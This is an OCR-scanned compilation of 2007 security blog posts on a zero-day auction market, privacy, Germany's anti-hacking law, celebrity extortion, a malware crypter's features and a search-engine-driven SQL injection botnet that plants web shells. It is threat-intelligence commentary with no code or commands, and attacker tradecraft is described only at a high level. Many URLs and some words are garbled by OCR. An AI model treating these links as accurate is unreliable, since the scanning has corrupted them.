Digital Armaments [8]delay "yesterday's" security 
vulnerability or keep you in [9]a "stay tuned" mode? How 
can you be sure you as an infomediary are not part of a 
scheme that's supplying zero days to both the underground 
and you? 

- why put an emphasis on something's that's a commodity, 
but forgetting that closing a temporarily opened up window 

of opportunity posed by today's zero day will lose its value 
in less than a minute by the time an IDS signature takes 

care of it while a patch is released? In exactly the very same 
fashion of [10]malicious economies of scale, a stolen 

personal and financial information is lossing value so that 
the attackers are trying to get rid of it as soon as possible, 
by the time it value doesn't decrease to practically zero. 

Stay tuned for [ll]a zero day vulnerabilities cash bubble. 

- how do you put a value on a vulnerability and what is your 
criteria? Of course, monocultural OSs get a higher 

priority, but does this mean that a zero day in MAC would 
get more bids because of the overall perception that 

it's invincible and the verification of such vulnerability 
would generate endless media echo effect, while someone's 

checking your current zero day propositions to see if the one 
he came across is still not listed there? For instance, 

[ 12JWabisabilabi have posted a Call for iPhone 
vulnerabilities in the first days of their launch. 



Theoretically, if everyone starts selling zero day 
vulnerabilities they find, there will be people who will 
superfi¬ 
cially [13]increase a zero day's value by holding it back and 
keeping quiet for as long as someone doesn't find it 

as well. Here's an interview I took from [14]David Endler at 
the Zero Day Initiative you may find informative, and 

[15]more opinions on the topic - [16]Computerworld; 
[17]Dark Reading; [18]Slashdot; [19]The Register; 
[20]TechTar- 

get; [21]Heise Security; [22]Techcrunch, and an interesting 
quote from a [23]BBC article that the initiative is aiming to 
limit the flow of vulnerabilities to the underground : 

" By rewarding researchers, the auction house aims to 
prevent flaws getting in to the hands of hi-tech criminals. " 
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It would have absolutely zero effect on the flow of 
vulnerabilities in computer underground circles, mostly 
because if someone likes the idea of getting a one time 
payment for its discovery, others would get a revenue 
stream for months 

to come by integrating it into the [24]underground 
ecosystem. Even the average [25]MPack attack kit, 
compared to 


others I've seen showcases the reality - a [26]huge number 
of people are infected and no zero day vulnerabilities 



are used but ones for which patches are available for 
months. Moreover, they don't just buy stockpiles of zero day 

vulnerabilities, but are actively discovering new ones as well 
and holding them back for as long as possible as I've 

already mentioned. 

And another one from [27]CNET : 


WSLabi is backed by about 5 million euros ( $6.8 million) 
from individual investors, and hopes to float on a stock 

exchange (probably London's AIM or a similar exchange in 
Oslo) in around 18 months. " 

Is this for real, and if so, it makes it yet another investment 
in the information security market to keep an eye 

on in the very same fashion I've been [28]following and 
speculating on SiteAdvisor's eventual, [29]now real acqui¬ 
sition. But WSLabi's road to an IPO would be a very, very 
bumpy one. Everyone's excluding the obvious, namely 

that the biggest and most targeted vendors could ruin 
WSLabi's entire business model by starting to offer financial 

incentives let's call them for zero day vulnerabilities, or 
perhaps keep it pragmatic, namely ignore the fact that 

someone's trading with zero days regarding their products 
mainly because the vendors cannot be held liable for not 


providing patches in a timely manner or not reacting to the 
threat. 



Two projects worth considering are the ElseNot one, listing 
[30]exploits for every Microsoft vulnerability ever, 

and [31]eEye's Zero Day Tracker, keeping track of 
unpatched vulnerabilities. Make sure what you wish for, so it 

doesn't actually happen. 

1. http://www.wslabi.com/wabisabilabi/home.do? 

2. http://ddanchev.blo as pot.com/2Q05/12/Qbav-how- 
realistic-is-market-for.html 

3. http://ddanchev.blo as pot.com/2QQ6/05/shapin a -market- 
for-securitv.html 

4. http://ddanchev.blo as pot.com/2QQ6/Ql/was-wmf- 
vulnerabil[t v- purchased-for.html 

5. http://ddanchev.blo as pot.com/2QQ6/Q3/wheres-mv-Qda v- 
please.html 

6. http://ddanchev.blo as pot.com/2006/Q4/wild-wild- 
under a round_25.html 

7. http://ddanchev.blo as pot.com/20Q6/Q3/successful- 
communication.html 


8. http://ddanchev.blo as pot.com/2QQ6/Q5/dela vina- 
vesterdavs-Odav-securitv.html 

9. http://ddanchev.blo as pot.com/2QQ6/Q9/zero-da v- 
initiative-upcomin a -zero-dav.html 


10. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 














































11. http://ddanchev.blo as pot.com/20Q7/01/zero-da v- 
vulnerabilities-cash-bubble.html 


12. http://wabisabilabi.blo as pot.com/ 

13. http://ddanchev.blo as pot.com/2QQ7/Ql/life-of-securit v- 
threat.html 


14. http://ddanchev.blo as oot.com/2QQ6/Ql/securit v- 
interviews-20Q42QQ5-part-3.html 

15. http://www.matasano.com/lo a /9Ql/zerobav-exists-will- 
the- i uice-be-worth-the-saueeze/ 

16. http://www.comouterworld.com/action/article.do? 
command=viewArticleBasic&articleld=9026363 


17. http://www.darkreadin g .com/document.as o? 
doc id = 12841 l&WT.svl = news2 1 


18. http://it.slashdot.or g /it/07/07/Q6/Q144234.shtml 

19. 

http://www.there a ister.co.uk/2QQ7/Q7/Q6/securitv_f1aw_mark 

et olace/ 

20 . 

http://searchsecuritv.techtar a et.eom/ori a inalContent/0 . 2891 
42, sidl4 a cil2634Q2 . QQ.html 

21. http://www.heise-securitv.co.uk/news/92258 

22. http://www.techcrunch.com/2007/07/Q6/hackers-eba v- 
lea itimate-marketplace-or-or a anized-blackmail/ 


23. http://news.bbc.co.Uk/2/hi/technolo a v/6276474.stm 
















































24. http://ddanchev.blo as pot.com/2QQ7/Q2/Dhishin a- 
ecosvstem.html 
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25. http://ddanchev.blo as pot.com/2QQ7/Q6/mpack-kit- 
attack-on-video.html 


26. http://ddanchev.blo as pot.com/2QQ7/Q6/massive- 
embedded-web-attack-in-italv.html 

27. 

http://news.com.com/Aucti on+site+sells+security+expl pits/ 
2100-7355 3-6195186.html 


28. http://ddanchev.blo as pot.com/2QQ6/Q2/look-whos- 
a onna-cash-for-evaluatin a .html 

29. http://ddanchev.blo as pot.com/2QQ6/Q4/spottin a¬ 
val uable-investments-in.html 


30. http://elsenot.com/ 

31. http://research.eeve.com/html/alerts/zeroda v/ 
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Terrorist Groups' Brand Identities (2007-07-09 16:02) 

The author of this [l]terrorist groups' logos compilation is 
greatly using business logos identity building analogy to 
discuss whether or not logos of terrorist groups successfully 
communicate their message or vision : 

" / did some research and rounded up as many logos as / 
could find from terrorist groups past and present. While I 
hate to give terrorists any more attention, I still think it's 
interesting to see the various approaches they took in their 
logos, and wonder what considerations went into designing 
them. Does the logo successfully convey the organization's 
message? Is it confusingly similar to another group's logo? 
Does it exhibit excessive drop shadows, gradients, or use of 
whatever font is the Arabic equivalent of Papyrus ?" 

And while it reminds me of another business analogy, 
namely a [2]A Cost-Benefit Analysis of Cyber Terrorism, such 

analogies clearly indicate two things - first, branding is 
something they are aware of, and second, they understand 





that evil advertising can easily turn into propaganda and a 
brainwashing tool given the numerous PR channels they 

already actively use - pretty much every Web 2.0 company 
that is out there. The screenshot above represents an 

advertisement of the [3]Mujahideen Secrets Encryption Tool, 
more screenshots of which you can find in a previous 

post. Despite that the tool is freely available for the 
wannabe jihadists to use, and that no one is ever going to 
receive a box-copy of it physically, GIMF took the time and 
effort to come up with a box-style software product ad 
realizing 

the basics of branding, namely that each and every contact 
with the brand - GIMF in this case - can either weaken or 

strengthen a brand's image in the perception of the 
prospective user/customer. 

1 . 

http://www.iron icsans.com/2QQ7/Q7/terrorist_or a anization_lo 
a os.html 

2. http://ddanchev.blo as pot.com/2QQ6/lQ/cost-benefit- 
analvsis-of-cvber.html 

3. http://ddanchev.blo as pot.com/2QQ7/Q4/mu i ahideen- 
secrets-encr v ption-tool.html 
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The Extremist Threat from Metallica (2007-07-09 
16:24) 

No, this is serious - [l]James Hetfield from Metallica 
questioned by airport security personel before the Live 
Earth 

concert in London because of "taliban-like beard" : 

" According to British newspaper The Times, the rocker 
jetted into Luton airport ahead of Saturday's Live Earth 
concert at Wembley Stadium - where his legendary rock 
band was due to perform - but was halted by officials before 
he 

could leave the terminal. The legendary frontman was 
then subjected to a brief line of questioning, after 
which 

security-conscious officials were left red-faced when 
Hetfield explained he was a member of a world- 
famous rock 


band. 


In 2007, [2]if you're named Muhammad you'll be living the 
life of someone else's stereotype that you're a terrorist, 

and with a beard it's even more suspicious, which is perhaps 
why [3]Muslims in the U.K started an anti-terror campaign 

"Not in Your Name" trying to distinguish themselves from 
such simple and totally wrong stereotypes. 

1. http://www.nzherald.co.nz/section/1501119/storv.cfm? 
c id = 1501119&ob i ectid = 10450450 

2. http://arabist.net/archives/2006/07/04/western-union- 
profiles-muslim-names/ 

3. 

http://news.bbc.co.Uk/2/hi/uk_news/en a land/london/627577 

2.stm 
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E-commerce and Privacy (2007-07-11 14:58) 

Privacy should be a main concern for everyone, not 
[l]because you have something to hide, but because you 
deserve 












it, it's your right, while on the other hand, the thin line 
between a sales department preservation of your 
purchasing history to later one contact you, or vice-versa to 
serve you better, is where the dilemma starts. Should you 
always 

have an opt-out capability, thus ruining someone's 
marketing data aggregation model, or should you be willing 
to 

share it in order to receive a better customer experience? 

In a [2]recently conducted study, researchers at Carnegie 
Mellon University came to the conclusion that peo- 



pie are in fact willing to pay more when their privacy is 
ensured, but mind you - in [3]a merchant's privacy policy 
only. 

Is this a feasible protective measure or just [4]a compliance- 
centered and automatically generated text you come 

across to on every merchant's web site? Or how harsh is in 
fact reality in this case? 

11 The study, led by Lorrie Cranor, director of the Carnegie 
Mellon Usable Privacy and Security (CUPS) Lab, 

found that people were more likely to buy from online 
merchants with good privacy policies, as identified by 
Privacy 

Finder and were also willing to pay about 60 cents extra on a 
$15 purchase when buying from a site with a privacy 

policy they liked. " 

One of the most famous breaches of personal data 
aggregators that really made it all over the world was 

Choicepoint, a U.S based personal data aggregator. Famous 
mainly because of the huge number of affected 

individuals, which doesn't mean a bigger breach hasn't 
happened somewhere around the world already, the thing 

is, across the world it is still not very popular [5]to report a 
security breach, even regulated by law - perhaps even if you 
were you wouldn't be able to report something you're not 
aware of at the first place, would you? Looking at a 



merchant's/data aggregator's privacy policy given you have 
enough experience to detect the authentic policy from 

the automatically generated one you often see something 
like this line in [6]Choicepoint's privacy policy for instance 


11 Once we receive personally-identifiable information, we 
take steps to protect its security on our systems. In 

the event we request or transmit sensitive information, such 
as credit card information or Social Security Numbers, 

we use industry standard, secure socket layer ("SSL") 
encryption . We limit access to personally-identifiable 
information to those employees who need access in order to 
carry out their job responsibilities. " 

The same is the case with Amazon, Ebay and the rest of the 
E-commerce icons. In 2007, even phishers use 

SSL certificates to make their spoofs look more legitimate, 
and again in 2007 the majority of reported data breaches 

are due to [7]laptop losses compared to network or even 
insider related vulnerabilities. Therefore, even though 

compliance with law regarding the need for a privacy policy, 
having it doesn't mean privacy of purchasing history 

and personal data wouldn't get exposed. 

Common privacy assurance criteria on major merchant's 
sites remain : 


- [8]TRUSTe certificate 



- [9]Hackersafe check 
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- Compliance with industry standard security best practices 

Best practices are a necessary evil, evil because what they're 
missing is exactly what attackers are exploiting - 

the pragmatic vulnerabilities to obtain the data in question 
compared to entering the target through the main door. 

Back in the times of the dotcom boom when Web 2.0's 
mature business models were a VC's dream come true, the 

overall perspective of Internet crime had to do with the 
concept of directly transferring funds from the a hacked 

through network vulnerabilities bank, while in reality, from 
an attacker's point of view it's far more effective to target its 
customers directly. Which is exactly the same case with E- 
commerce and privacy, either the merchant will store 

your business relationship with them and expose it, or you 
will somehow leak it out. 

Whatever the case, a privacy policy is words, and common 
sense obviously remains a special mode of think¬ 
ing for the majority of web shoppers. 

Related posts: 

[10] Afterlife Data Privacy 

[11] The Future of Privacy = Don't Over-empower the 
Watchers 



[12] Anonymity or Privacy on the Internet? 

[13] U.K's Telecoms Lack of Web Site Privacy 

[14] Big Brother Awards 2007 

[15] A Comparison of U.S and European Privacy Practices 

1. http://ssrn.com/abstract=998565 

2. http://oressesc.com/01181159576 price of privac y 

3. http://ddanchev.blo as pot.com/2006/ll/to-publish-privac v- 
policv-or-not-to.html 

4. http://ddanchev.blo as pot.com/2006/09/exanninin a- 
internet-privac v- policies.html 

5. http://ddanchev.blo as pot.com/2006/01/to-report-or-not-to- 
re oort.html 

6. http://choicepoint.com/privacv.html 

7. http://ddanchev.blo as pot.com/2007/Q3/personal-data- 
securitv-breaches.html 

8. http://www.truste.or a/ 

9. http://www.scanalert.com/ 

10. http://ddanchev.blo as pot.com/2006/Q9/afterlife-data- 
privacv.html 

11. http://ddanchev.blo as pot.com/2006/Q3/future-of-privac v- 
dont-over-empower.html 

12. http://ddanchev.blo as pot.com/20Q6/01/anonvmitv-or- 
privacv-on-internet.html 















































13. http://ddanchev.blo as pot.com/2007/Q3/uk-telecoms-lack- 
of-web-site-privacv.html 


14. http://ddanchev.blo as pot.com/2007/05/bi a -brother- 
awards-2007.html 


15. http://ddanchev.blo as pot.com/2006/04/connparison-of- 
us-and-european-privacv.html 
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Insecure Bureaucracy in Germany (2007-07-11 15:49) 

First, it was [l]data mining 22 million credit cards to see who 
purchased access to a set of child porn sites to figure out the 
obvious - that the accounts were purchased with stolen 
credit cards, and now, declaring that hacking tools are 

illegal is nothing more but creating a bureaucratic safe 
heaven on the local scene. And while pen-testers in Germany 

will do password cracking with a paper and a pen to verify 
their passwords best practices are indeed enforced and 

taken seriously, script kiddies that just compiled yet another 
5GB rainbow table will [2]have a competitive advantage 

by default: 

" The distinctions between, for example, a password cracker 
and a password recovery tool, or a utility designed to run 
denial of service attacks and one designed to stress-test a 
network, are not properly covered in the legislation, critics 
argue. Taken as read, the law might even even make use of 
data recovery software to bypass file access permissions and 
gain access to deleted data potentially illegal. " 


















The idea is greatly hoping that Germany's Internet is an 
isolated Intranet where if noone can have access to hack¬ 
ing tools than noone will be able to find vulnerable hosts and 
actually exploit them. But the reality is that it's all a matter 
of perspective. By not wanting to conduct a security audit of 
your assets, and with the lack of any (detected) 

breaches, you're enjoying a nice false sense of security. This 
story is a great example of bureaucrats evangelizing 

security through obscurity on a wide scale, where every 
single script kiddie on the other side of the world will have 

access to a commodity set of pen-testing tools to showcase 
age-old vulnerabilities in Germany's infrastructure. Of 

course, you're secure in your own twisted reality, but limiting 
access to pen-testing tools for a security consultant, and evil 
hacking programs to others, in order for you to improve 
security is nost just unpragmatic, but naive as well. 

Here's [3]an interview with Marco Gercke, a local expert on 
the topic. 

This is not just a seperate case in Germany, to what looks like 
a growing trends with a previous discussion on whether or 
not [4]German law enforcement should code and use 
malware on a suspect's PC, something by the way [5]the FBI 

is doing in the form of keyloggers to obtain passphrasess of 
impossible crack at least in respect to bruteforcing PGP 

and Hushmail accounts. So what could be a next? A law that 
would open up a cooperation with anti virus vendors 

doing business in the country in the form of either not 
detecting or delaying signatures of law enforcement coded 
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malware? Or [6]law enforcement will start bidding for zero 
day vulnerabilities right next to an intelligence agency 
without both of them knowing who's the challenging bidder? 

Another bureaucratic development from the past is related to 
U.K's perspective on [7]how to obtain access to en¬ 
crypted material without coding malware and keyloggers - by 
requesting that everyone should provide their private 

encryption keys. It gets even more interesting with 

[8] Australia joining the trend by using spyware on suspects. 

Never let a bureaucrat do an ethical pen-tester's job. 

Related articles: 

[9] Group: Anti-hacking laws can hobble Net security 

[10] Hacking or reverse engineering? 

1. http://ddanchev.blo as pot.com/2007/01/data-nninin a- 
credit-cards-for-child-porn.html 

2. http://www.there a ister.co.uk/2007/05/30/ a armanv anti- 
hackin a law/ 

3. http://www.securitvfocus.com/columnists/448 

4. 

http://www.computerworld.com.aU/index. ph p/id : 596622433 : 

fp: 4194304 :foid:l 


5. http://news.com.com/8301-10784 3-9741357-7.html 




















6. http://ddanchev.blo as pot.com/2007/07/zero-da v- 
vulnerabilities-auction.html 


7. http://ddanchev.blo as pot.com/2006/06/all-vour- 
confidentialitv-are-belon a -to.html 

8. http://news.com.com/Australian + police+ a et+ ao- 
ahead + on+s p vware/2100-7348 3-5491671.html 

9. http://www.securitvfocus.com/news/11470 

10 . 

http://weblo a .infoworld.com/ vaa er/archives/2007/Q7/hackin a 
or reve.html 
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Targeted Extortion Attacks at Celebrities (2007-07-17 
15:28) 

Who else wants to hack celebrities besides wannabe uber 
leet h4x0rs looking for fame while brute forcing with 

username "Philton" and using a common pet names 
dictionary word list? Digitally naughty paparazzi wanting to 
have celebrities do their work for them? Not necessarily as 
third-parties are looking for direct revenue streams out 

of obtaining personal and often devastating to a cebrity's PR 
photos by [ljtargeted hacking attacks combined with 

extortion attempts : 

" According to the police and 5.M. Entertainment Friday, a 
23-year-old college student was arrested for hacking a blog 
of singer Bo A and blackmailing her, threatening to spread 






















her private photos. The student, identified as Seo, sneaked 
onto Bo A's Cy world blog in April 2006 and obtained photos 
that she took with a male singer. He sent e-mails to her 
manager to threaten that he would release the photos if they 
did not provide money He took 35 million won. S.M. 

Entertainment said in a press release that the victim was 
BoA and the male singer was Ahn Danny, former member 

of pop group g.o.d., and the two have been dose friends. " 

That type of extortion attacks are fundamentally flawed 
based on the attacker's perspective that the stolen personal 

data is most valuable to the person who faces major privacy 
exposure, totally excluding the possibility to forward it 

to thirt parties such as the "yellow press". Timing as in 
[2]cryptoviral extortion is everything, for instance, a couple 
of million dollars PR campaign positioning the singer as a 
vivid anti drugs and anti alcohol activities could turn into a 
fiasco if pictures of hear stoned and drunk to death leak at 
that very particular moment. Celebrity endorsement 

is always tricky, and the in very same way your brand can 
harness the popularity of a celebrity, your entire business 
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model could become dependent on someone's ability to 
manage stress, thus not getting involved into synthetic sins. 

Here's yet another related story [3]this time targeting Linkin 
Park : 

" In a plea agreement, she said she was able to see the 
family's photographs and travel plans, as well as 



information about a home they had purchased. She also read 
messages sent between Linkin Park's record company 

and lawyer , including a copy of the band's recording 
contract. " 

Meanwhile, [4]more targeted attacks make their invisible 
rounds across the world : 

11 On June 26, MessageLabs intercepted more than 500 
individual email attacks targeted toward individuals in senior 
management positions within organizations around the 
world. The attack was so precisely addressed that the name 

and job title of the victim was included within the subject 
line of the email. An analysis of the positions targeted 
reveals that Chief Investment Officers accounted for 30 
percent of the attacks, 11 percent were CEOs, CIOs 
accounted for almost seven percent and six percent were 
CFOs. 11 

For quite some time spammers have been segmenting and 
sort of data mining their harvested emails databases to 

not only get rid of fake emails and ones on purposely 
distributed by security companies, but to also start offering 
lists on a per country, per city, even per company basis. In a 
Web 2.0 world, top management is actively networking in 

way never imagined before, and despite that privacy through 
obscurity may seem a sound approach, someone out 

there will sooner or later get malware infected and have their 
HDD harvested for emails, thus exposing the what's 

thought to be a private email for a top executive. I often 
come across such segmented propositions for specific emails 



of specific companies, and even more interesting, people are 
starting to request emails for certain companies only, 

so that they can directly target the company in question with 
a typical zero day malware packed and crypted to the 

bottom of its binary brain. 

Despite all these emerging trends, we should never exclude 
the possibility for a guerilla marketing campaign based 

on a celebrity's leak of personal, often nude personal data, a 
technique in the arsenal of the truly desperate. 

1. http://www.asiamedia.ucla.edu/article-eastasia.as p? 
parentid = 71977 

2. http://www.viruslist.com/en/weblo a 7weblo ci iid = 208187396 

3. http://news.bbc.co.Uk/l/hi/entertainment/6260592.stm 

4. http://www.messa a elabs.com/resources/press/3845 
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Bluetooth Movement Tracking (2007-07-18 11:45) 

Passing by the local Hugo Boss store, all of a sudden you 
receive a SMS message - 11 It's obvious you like out new suits 
collection since that's the 5th time you pass by our store, 
and spend on average 15 seconds staring at them. So, why 
don't you come inside and take a closer look for yourself ?". 
Spooky? For sure, but with [l]bluetooth movement tracking 
to faciliate purchases slowly emerging in the practices of evil 
marketers basically generating even more 











touch points with the assets in their brands' portofolios, it's 
something to keep an eye on : 

11 When the project was deployed at the ZeroOne Festival is 
San Jose, California, the system sent attendees 

messages about where they had been and asked about their 
intentions for being there. For example, one such 

message read, "You were in a flower shop and spent 30 
minutes in the park; are you in love?" Those contacted were 

eventually led to the Loca kiosk where they could obtain a 
log of ail their activities, which sometimes reached over 
100m long. It should be noted that movement was only 
tracked on phones with discovery mode turned on. " 

Marketing research and faciliating purchases aren't the only 
incentives for marketers and of course malicious attackers 
looking for innovative ways to socially engineer you to 
accept a bluetooth connection, even an attachment. 
Measuring the ROI of advertising and sales practices that 
used to lack reliable metrics is becoming rather common, like 
for 
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instance this [2]Big Brother style billboards that measure 
how many people actually looked at them : 

11 if you've ever seen a poster in the mail that you've liked 
and stared at it for some time, chances are, that poster will 
be staring right back. This is, however, not so much of a "Big 
Brother" gimmick as much as it is a marketing tool. From 
xuuk, a Canadian-based company specializing in cutting- 
edge technology, comes the [3] eyebox2. This contraption is 
essentially a tiny video camera surrounded by infrared light- 



emitting diodes. It can record eye contact with 15-degree 
accuracy at a distance of up to 33 feet, so even a simple 
glance from someone in passing will be tallied into the score. 


I can certainly speculate that this technology will evolve in a 
way that it will be able to tell whether it was a male, or a 
female that looked at it, and if data from local stores gets 
syndicated to tell the system the prospective customer took 
notice of the store itself, it would provide the marketers with 
enough confidence to SMS you a discount offer valid in the 
next couple of hours only while you're still somewhere 
around a local store. 

The [4]convergence of surveillance technologies is a fact, 
and what's measuring the ROI of a marketing campaign to 

some, is an aggressive privacy violations for others. But as 
we've already seen the pattern of such technologies around 
the world, first they get legally abused, then customers 
suddenly turn into vivid privacy activists, to later on have 
the option to opt-in and opt-out so that everyone's happy. 

1. http://www.bluetoothsource.net/2007/05/loca-art-pro i ect- 
tracks-vour-movements 

2. http://www.nerd a rind.com/2007/06/12/the-billboards-are- 
watchin a- vou/ 

3. 

http://www.wired.com/ a ad a ets/miscellaneous/news/2007/06/ 

e vetrackin a 

4. http://ddanchev.blo as pot.com/2007/06/cell-phone- 
stalkin a .html 
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A Multi Feature Malware Crypter (2007-07-18 14:57) 

Compared to the [l]malware [2]crypters I [3]covered in 
previous posts - part of the [4]Malicious Wild West series - 

this one is going way beyond the usual file obfuscation, and 
despite that it's offered for sale and not in the wild yet, it 
includes anti-sandboxing, and anti-virtual machine 
capabilities, as malware authors started feeling the pressure 

posed by the two concepts when it comes to detecting their 
releases. 

Features include : 

- Add File to load on Memory 

- Add File to load on Browser 

- Add File to drop on Temp 

- Add File to drop on System 

- Add File to drop on Windows 

- Process injection 

- Different crypting routines on a per buyer basis 

- Mega icons pack with the purchase 

So let's sum up, the [5]end user isn't bothering to update her 
anti virus software signatures, and even if she 

did and despite [6]a vendor's response time, the concept of 
zero day malware and rebooting the lifecycle of a 


malware release through crypting it, is sort of [7]ruining the 
signatures based scanning approach. Still living in 

the [8]suspicious file attachments world, the end user is 
easily falling victim into [9]web site embedded malware 

taking advantage of months old client side vulnerabilities in 
their web browser, media player and everything in 

between. [10]Botnet communication platforms are maturing, 
not with the idea to innovate, but [ll]to diver¬ 
sify the communications channels, and so are [12]malware 
embedding and [ 13]statistics kits. [14]OSINT through 

botnets given the amount of infected PCs is a fully sound 
practice, and so is [15]corporate espionage through botnets. 
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Moreover, what used to a situation where malware authors 
were doing over their best to maintain their releases as 
invisible as possible, nowadays, malware is directly 
exploiting vulnerabilities within anti virus software to 

[16]evade detection or get rid of the anti virus software itself. 
In fact, [17]malware authors became so efficient so 

that vendors are coming up with very interesting stats based 
on the [18]greediest, [19]smallest, [20]largest and most 

malicious malware on a monthly basis. 

As always, the "best" is yet to come. 

1. http://ddanchev.blo as pot.com/2007/Q3/shots-from- 
malicious-wild-west-sample 10.html 






2. http://ddanchev.blo as pot.com/2007/05/vet-another- 
malware-cr v ptorin-wild.html 

3. http://ddanchev.blo as pot.com/2007/05/nnalware-loader- 
for-sale.html 

4. http://ddanchev.blo as pot.com/2007/Q4/shots-from- 
malicious-wild-west-sample 25.html 

5. http://ddanchev.blo as pot.com/2006/Q7/anti-virus- 
sia natures-update-it-could.html 

6. http://ddanchev.blo as pot.com/2006/08/virus-outbreak- 
response-time.html 

7. http://ddanchev.blo as pot.com/20Q6/01/whv-rel vina -on- 
virus-si a natures-sim pl v.html 

8. http://ddanchev.blo as pot.com/20Q7/01/social- 
en a ineerin a -and-malware.html 

9. http://ddanchev.blo as pot.com/2007/Q6/exploits-servin a- 
domains.html 


10. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-platforms.html 

11. http://ddanchev.blo as pot.com/2007/Q2/storm-worm- 
switchin a-propaa ation.html 

12. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-in-italv.html 

13. http://ddanchev.blo as pot.com/2007/06/mpack-kit-attack- 
on-video.html 


14. http://ddanchev.blo as pot.com/2007/Q4/osint-throu ah- 
botnets.html 























































15. http://ddanchev.blo as pot.com/2007/05/corporate- 
es piona a e-throu a h-botnets.html 

16. http://www.viruslist.com/en/analvsis?pubid = 204791949 

17. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

18. http://www.viruslist.com/en/weblo a? 
weblo a id = 208187399 

19. http://www.viruslist.com/en/weblo a? 
weblo a i d = 2 08187362 

20. http://www.viruslist.com/en/weblo a? 
weblo a id = 2 08187326 

342 




SQL Injection Through Search Engines 
Reconnaissance (2007-07-19 14:58) 

In previous posts M [l]Google Hacking for Vulnerabilities" ; " 
[2]Google Hacking for Cryptographic Secrets" and 

"[3]Nation Wide Google Hacking Initiative" I emphasized on 
the concept of using search engines for reconnaissance 
purposes and for building hitlists of targets susceptible to 
remotely exploitable web application vulnerabilities. 

Yesterday, I came across to an IRC based botnet C &C and the 
bots activities follow in the form of screenshots and summary 
of the reconnaissance approaches used. 

- Remotely exploitable SQL injection vulnerabilities act as 
the infection vector 



























- Taking advantage of the most popular search engines' 
indexes, vulnerable sites and web pages get automatically 
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detected and simultaneously exploited 

- The scanning bots injects back the most popular web shell 
c99shell, so that ull control with UID based on the web 

server's use privileges is gained 

- Hosting of malware embedded sites, phishing and spam 
pages, blackhat SEO taking advantage of the domain's 
pager- 

ank are among the few examples of how is the access abused 

These so called M [4]malicious economies of scale" showcase 
the following : 
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- botnet masters are using search engines to build a hitlist of 
easy to attack targets 

- a new command is gaining malware author's attention, 
namely imilwOrm that is directly syndicating remotely 
exploitable web application vulnerabilities 

- approximately 10 to 15 sites got remotely SQL injected in 
the first minute of monitoring the bot 

- web application vulnerabilities continue to get a lower 
priority in an infosec budget 


- XSS vulnerabilities to actually have e-bank.com forward the 
captured information to a third-paty via a phishing attack 
undermine SSL certificates and the rest of the "yes, we're 
working on it" security for the massess approaches 

- c99shell may be the most popular web shell, but taking into 
considerating the Web-ization of malware, and how a 

huge number of [5]web application backdoors remain 
undetected by anti virus software, botnet masters and 
malicious 

attackers are gaining competitive advantage in a very 
efficient way 

- botnet masters are not rocket scientiests, in some of the IRC 
channels used to control the scan bots, the administrators 
were so lame they were even allowing complete outsiders to 
perform scanning commands based on their preferences 

- despite that the majority of SQL injected sites are 
connected to a centralized web shell, even if it gets shut 
down, namely a home user somewhere across the world is 
acting as a C &C for the entire campaign, the site remains 
vulnerable and anything can make it "phone wherever they 
want to" 

- the botnet masters in this particular case were also 
interested in the FREE SPACE they have available at the 
exploited domains 

What are the search engines doing to tackle the search 
engine hacking possibilities, especially Google being the 
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most widely used and having the most comprehensive 
index? They're successfully [6]implementing CAPTCHA's for 

such suspicious scanning bot behaviour: 

11 At [7]ACM WORM 2006, we published a paper on [8]Search 
Worms [PDF] that takes a much closer look at this 
phenomenon. [9]Santy, one of the search worms we 
analyzed, looks for remote-execution vulnerabilities in the 
popular 

phpBB2 web application. In addition to exhibiting worm like 
propagation patterns, Santy also installs a botnet client as a 
payload that connects the compromised web server to an 
IRC channel. Adversaries can then remotely control 

the compromised web servers and use them for DDoS 
attacks, spam or phishing. Overtime, the adversaries have 

realized that even though a botnet consisting of web servers 
provides a lot of aggregate bandwidth, they can increase 
leverage by changing the content on the compromised web 
servers to infect visitors and in turn join the computers of 
compromised visitors into much larger botnets. " 

It will not solve the parsing approach scanning bots are 
implementing, so I think that in the short term a database 

of google hacking searches may indeed get a CAPTCHA 
verification by default. An IP reputation system has a lot of 

potential too, and with [10]Google's acquisition of Postini, 
they already have a huge population of IPs you should not 
trust for anything. My expirience shows that once you get a 
phishing email from a single IP, you will sooner or later 



see the same IP hosting and sending malware, hosting as 
well as sending spam, and pretty much anything malicious. 
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Malware Embedded Sites Increasing (2007-07-25 
17:26) 

The emerging trend of malware embedded sites 












































Malware embedded web sites are steadily gaining a priority 
in an attacker's arsenal of infection and propagation 

vectors, and we've been witnessing the trend for over an 
year and a half now. Malware authors seem to have found 

an efficient way to hijack, inject and exploit legitimate sites 
or Web 2.0 services in order to serve the obfuscated 

payload which is no longer purely relying on [ljsocial 
engineering tactics, but is basically exploiting unpatched 
client side vulnerabilities to infect the visitors. Also, malware 
authors seem to have started thinking as true marketers, 

taking into consideration that a visitor will go through a 
potentially malware embedded site only once and wouldn't 

visit it given the lack of content - blackhat SEO garbage - so 
that they've stopped relying on having a malicious site 
exploit a single vulnerability only, and started hosting multi¬ 
browser, multi-third-party malware embedded sites, thus 
achieving malicious economies of scale. Here's a great 
summary courtesy of Sophos showcasing the [2]increasing 

number of sites with malware embedded payload : 

11 The figures compiled by Sophos's global network of 
monitoring stations show that infected web pages continue 
to pose a threat , affecting official government websites as 
well as other legitimate pages. On average this month, 
Sophos uncovered 9,500 new infected web pages daily - an 
increase of more than 1000 every day when compared to 
April. In 

total, 304,000 web pages hosting malicious code were 
identified in May. " 



The stats are a great wake up call for those still believing 
that malware comes in the form of executables and is 
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mostly using email as propagation and infection vector. 
Moreover, [3]these stats show great similaties with the ones 

released by ScanSafe an year ago whose conclusion was that 
based on 5 billion web requests there was once piece 

of malware hosted on 1 of every 600 social networking 
pages. Furthermore, [4]Finjan's latest Web Security Trends 

Report indicates the rise of evasive web malware that is 
aiming at making cyber forensics of malware embedded sites 

like the ones I provided you with in previous posts, harder to 
conduct. 

Malware embedding techniques 

- vulnerabilities within popular traffic aggregators and web 
2.0 darlings have a huge potential, but a major downsize 

from an attacker's perspective - they're like sending several 
hundred pieces of zero day malware to couple of mil¬ 
lion emails, thus having [5]anti virus vendors and the 
security community detect the malware outbreak and react 

accordingly 

- a pull approach consisting of [6]blackhat SEO on popular 
searches, or any strategy related to seducing the end user's 
desire for "free lunch" online while abusing it. We've already 


seen [7]automated spamming attacks at the .EDU domain in 
